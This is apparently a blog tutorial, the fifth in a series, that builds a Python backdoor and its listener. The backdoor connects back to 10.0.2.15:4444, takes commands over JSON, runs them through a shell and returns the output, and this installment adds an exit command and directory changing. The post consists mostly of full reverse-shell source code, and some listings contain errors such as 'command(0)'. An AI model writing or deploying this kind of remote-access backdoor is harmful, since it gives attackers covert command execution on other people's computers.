Backdoor 05 : Adding exit command | Accessing system files

2 min read
0

#SOLVING TWO PROBLEM IN OUR PROGRAMMES

  • #1. SEPARATING MY COMMANDS FROM ITS ARGUMENTS & ADDING A PROPPER EXIT COMMAND FOR OUR PROGRAMS!
  • #2. EXECUTING COMMANDS WORKS FINE BUT ACCESSING THE DIRECTORY DOESN'T WORK!

#1. SEPARATING MY COMMANDS FROM ITS ARGUMENTS & ADDING A PROPPER EXIT COMMAND FOR OUR PROGRAMS!

OK, now that we built a strong base for our back door and we know that we can use it to send and receive Full-data.

If you look at all of the commands that we want to implement, they all take some sort of argument or option.

So when we want to use the CD, we're given the directory name.

When we want to upload the file, we're given the file name.

And when we want to download the file, we're downloading the file name.

Also, probably if you want to add more features, chances are you'll want your features or your command to be able to take arguments or to send arguments to the target.

Right now we send everything as a string, but it'll actually make sense to split the string or the command that the user inputs into a list so that the first element of the list is going to be the command.

And the second element is going to be the first argument.

The third element, if there is a third element, will be the third argument and so on.

And since we built a strong base, since our send and receive methods used JSON, we can actually send lists to and from the backdoor.

So what I want to do in listener, I'm taking the command from my raw input and my command right now is literally a string.

So what I'm going to do, I'm going to say my command is equal to the command that split and I'm going to split this based on space.

line-40= 
  • command = command.split(" ")

So the string is going to be converted into a list in which each element is a word in this string.

So let me show you an example.

we commented on the result and print the command

#SEPARATING MY COMMAND FROM ITS ARGUMENT BY USING LIST


#WHY WE DID THIS?
LET US TAKE AN EXMPLE
AS U KNOW WE EXIT OUR PROGRAMM BY CTRL+C 
BETTER WAY OF DOING IS TO MAKE A EXIT COMMAND
SO TO MAKE A EXIT COMMAND WE NEED TO ACCESS THE 1ST ARGUMMENT
THAT WE TYPE IN TERMINAL,SO WE NEED TO SEPERATE THE MY COMMAND FROM ITS ARGUMENT SO I CAN ACCESS THE 1ST ARGUMENT AS A LIST

    #CODE: IMPLEMENTING EXIT COMMAND LISTENER
    #The program will close properly without using ctrl+c in listener
    1. #!/usr/bin/env python
    2. import socket
    3. import json

    5. class Listener:
    6.     def __init__(self, ip, port):
    7.         listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    8.         listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    9.         listener.bind((ip, port))
    10.         listener.listen(0)
    11.         print("[+]Waiting for incomming connection")
    12.         self.connection, address = listener.accept()
    13.         print("[+]Got a connection from" + str(address))

    15.     def json_send(self, data):
    16.         json_data = json.dumps(data)
    17.         self.connection.send(json_data)

    19.     def json_receive(self):
    20.         json_data = ""
    21.         while True:
    22.             try:
    23.                 json_data = json_data + self.connection.recv(1024)
    24.                 return json.loads(json_data)
    25.             except ValueError:
    26.                 continue

    28.     def execute_remotely(self, command):
    29.         self.json_send(command)

    31.         if command(0) == "exit":
    32.             self.connection.close()
    33.             exit()

    35.         return self.json_receive()

    37.     def run(self):
    38.         while True:
    39.             command = raw_input(">> ")
    40.             command = command.split(" ")
    41.             result = self.execute_remotely(command)
    42.             print(result)


    45. my_listener = Listener("10.0.2.15", 4444)
    46. my_listener.run()

    #EXPLANATION
    line-31-33 = 
    • if command[0] == "exit":
    •   self.connection.close()
    •   exit()
    And what I'm going to do in my execute_system_command.
    This is already taking the command
    • if command[0] == "exit":
    So we're checking if the first element, which is this element of the command, is equal to exit.
    Then we want to, first of all, close our connection
    • self.connection.close()
    then I want to exit the Python program
    TO EXIT A PYTHON PROGRAM
    • we do exit()
    Now, this will properly exit me out of the listener, 
    but the backdoor will still be running.

    I'm going to send this command to the backdoor so that the backdoor will know that we want to exit.
    • self.json_send(command)
    so we put our send command before our EXIT command!

    #CODE: IMPLEMENTING EXIT COMMAND BACKDOOR
    #The program will close properly without using ctrl+C instead we use EXIT command
    1. #!/usr/bin/env python
    2. import socket
    3. import subprocess
    4. import json

    6. class Backdoor:
    7.     def __init__(self, ip, port):
    8.         self.connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    9.         self.connection.connect((ip, port))

    11.     def json_send(self, data):
    12.         json_data = json.dumps(data)
    13.         self.connection.send(json_data)

    15.     def json_receive(self):
    16.         json_data = ""
    17.         while True:
    18.             try:
    19.                 json_data = json_data + self.connection.recv(1024)
    20.                 return json.loads(json_data)
    21.             except ValueError:
    22.                 continue

    24.     def execute_system_command(self, command):
    25.         return subprocess.check_output(command, shell=True)

    27.     def run(self):
    28.         while True:
    29.             command = self.json_receive()
    30.             if command(0) == "exit":
    31.                 self.connection.close()
    32.                 exit()
    33.             command_result = self.execute_system_command(command)
    34.             self.json_send(command_result)

    36. my_backdoor = Backdoor("10.0.2.15", 4444)
    37. my_backdoor.run()

    #EXPLANATION
    line-31-33 = 
    •             command = self.json_receive()
    •             if command[0] == "exit":
    •                 self.connection.close()
    •                 exit()
    We will receive our command in our receive function
    So we put the EXIT command in the receive function
    Hence the command will also get EXIT in the backdoor also

    #AS U CAN SEE IN THE ABOVE IMAGE SFTER TYPING EXIT THE PROGRAMM GET EXIT PROPERLY

    #2. EXECUTING COMMANDS WORKS FINE BUT ACCESSING THE DIRECTORY DOESN'T WORK!

    AS u can see we cannot access the directory so,We need to modify our backdoor!!

    #CODE: MODIFYING OUR BACKDOOR TO ACCESS THE DIRECTORY AND THEIR FILES
    1. #!/usr/bin/env python
    2. import socket
    3. import subprocess
    4. import json
    5. import os

    7. class Backdoor:
    8.     def __init__(self, ip, port):
    9.         self.connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    10.         self.connection.connect((ip, port))

    12.     def json_send(self, data):
    13.         json_data = json.dumps(data)
    14.         self.connection.send(json_data)

    16.     def json_receive(self):
    17.         json_data = ""
    18.         while True:
    19.             try:
    20.                 json_data = json_data + self.connection.recv(1024)
    21.                 return json.loads(json_data)
    22.             except ValueError:
    23.                 continue

    25.     def execute_system_command(self, command):
    26.         return subprocess.check_output(command, shell=True)

    28.     def change_working_directory_to(self, path):
    29.         os.chdir(path)
    30.         return"[+] Working directory has been changed" + path


    33.     def run(self):
    34.         while True:
    35.             command = self.json_receive()
    36.             if command[0] == "exit":
    37.                 self.connection.close()
    38.                 exit()
    39.             elif command[0] == "cd" and len(command) > 1:
    40.                 command_result = self.change_working_directory_to(command[1])
    41.             else:
    42.                 command_result = self.execute_system_command(command)

    44.             self.json_send(command_result)

    46. my_backdoor = Backdoor("10.0.2.15", 4444)
    47. my_backdoor.run()

    #EXPLANATION

    • def change_working_directory_to(self, path):
    •     os.chdir(path)
    •     return "[+] Working directory has been changed" + path

    Creating a new function named change_working_directory_to include self and path

    imported os 

    os = its simply used to changed the directory we have also seen this in the download and execute script

    we are going to return a message saying 

    'Working directory has been changed'

    and we will append a path at the end of the message

    • def run(self):
    •     while True:
    •         command = self.json_receive()
    •         if command[0] == "exit":
    •             self.connection.close()
    •             exit()
    •         elif command[0] == "cd" and len(command) > 1:
    •             command_result = self.change_working_directory_to(command[1])
    •         else:
    •             command_result = self.execute_system_command(command)

    •         self.json_send(command_result)

    IN RUN FUNCTION

    we are cheaking if the 1st element of the command lists equal to exit then we are going to exit

    Then I'm going to add another check-in which, I'm going to say 

    • elif [else+if]

    command[0] for 1st element is equal to 'cd' and length of command is greater than 1 [command is greater than 1 means 'cd..'] then we're going to call 

    • self.change_working_directory_to

    and we need to pass the path that we want to change our working directory to as an input.

    The path is going to be the second element of the input which is [1] &

    • command_result = self.change_working_directory_to(command[1])

    which will simply return '[+] Working directory has been changed'

    • else:

    And finally, if the command was not 'cd' or 'exit' 

    Then I want you to execute the command as a normal system command.

    • command_result = self.execute_system_command(command)






    4.94 / 169 rates

    Post a Comment

    If you have any doubts, please let me know

    Previous Post Next Post